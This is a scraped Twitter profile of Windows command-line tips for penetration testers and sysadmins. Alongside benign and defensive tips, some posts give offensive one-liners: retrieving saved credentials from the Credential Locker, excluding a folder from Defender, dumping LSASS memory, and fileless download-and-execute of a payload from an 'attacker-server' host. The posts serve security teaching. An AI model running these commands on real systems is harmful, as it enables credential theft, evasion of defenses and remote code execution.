Windows CLI gems
@wincmdfu
Followers
6K
Following
3
Media
0
Statuses
134
Managed by @riyazwalikar
Joined June 2014
I did a talk on Windows priv escalation pentest techniques. Used some inbuilt commands. https://t.co/b3gQrCRvUx
#pentest #windows #security
1
162
251
Retrieve credentials stored in the Win Credential Locker PS C:\> [ https://t.co/dhH6Bm4zQt.Credentials.PasswordVault,.,ContentType=WindowsRuntime] PS C:\> (New-Object https://t.co/dhH6Bm4zQt.Credentials.PasswordVault).RetrieveAll()
#oscp #security #pentest #redteam #PowerShell
1
61
197
From thick #client #exploitation to becoming #Kubernetes cluster Admin  - The story of a fun bug we found and it's exploitation https://t.co/EAPlc74njB
#k8s #windows #privilege #escalation #sysinternals #penetration #pentest cc @appseccouk
0
42
65
#Powershell script to fetch missing #Windows updates PS C:\> (New-Object -ComObject microsoft.update.session).CreateUpdateSearcher().Search("IsHidden=0 and IsInstalled=0").Updates | select Title,RebootRequired,CVEIds,IsMandatory #security #Microsoft #security #pentest #redteam
3
139
379
Add a file/folder to #Windows Defender exclusion list C:\>powershell -exec bypass - "Add-MpPreference -ExclusionPath 'D:\EvilFolder\Tools'" useful if you want to move #pentest tools to a Windows machine without Defender interfering Admin UAC prompt required #powershell #oscp
3
132
313
Happy new year! Map #Sysinternals tools folder locally, run tools when required. Useful on a compromised remote machine to avoid tool clutter. net use Z: \\ https://t.co/CP83SaQ7we\tools\ "/user:" dir Z: Z:\procdump -accepteula -ma lsass.exe lsassdmp #pentest #sysadmin #redteam
6
229
542
Download and execute a #PowerShell script without touching the disk (fileless). powershell -exec bypass -c "iwr('
http://attacker-server/payload.ps1')|iex"
#pentest #postexploitation #oscp
3
159
344
Display list of blocked ports on the #firewall using #powershell. Add other attributes to 'select' to increase verbosity. PS C:\> $f=New-object -comObject HNetCfg.FwPolicy2;$f.rules | where {$_.action -eq "0"} | select name,applicationname,localports #sysadmin #windows
0
146
321
Set IP address using #netsh. Needs elevation. Fetch all interface names: C:\> netsh interface ip show interfaces Set a IP address & gateway: C:\> netsh interface ip add address name="Wi-Fi" addr=192.168.100.200 mask=255.255.255.0 gateway=192.168.100.1 gwmetric=2000
0
35
81
Stop #Badrabbit Elevatd cmd in C:\Windows\ echo "" > infpub.dat echo "" > cscc.dat cacls infpub.dat /D everyone cacls cscc.dat /D everyone
4
166
250
Wrote a post on executing Windows binaries through #WSL. Lots of commands. Was trying to setup a PoC for #bashware: https://t.co/qi6IbYSRwv
0
18
31
Disable SMBv1 (apart frm patching MS17-010) to prevent #wannacrypt: C:\> dism /online /norestart /disable-feature /featurename:SMB1Protocol
5
302
317
Delete all #InternetExplorer history, cookies, form data, pwds & temporary files. C:\> rundll32.exe inetcpl.cpl,ClearMyTracksByProcess 255
0
72
97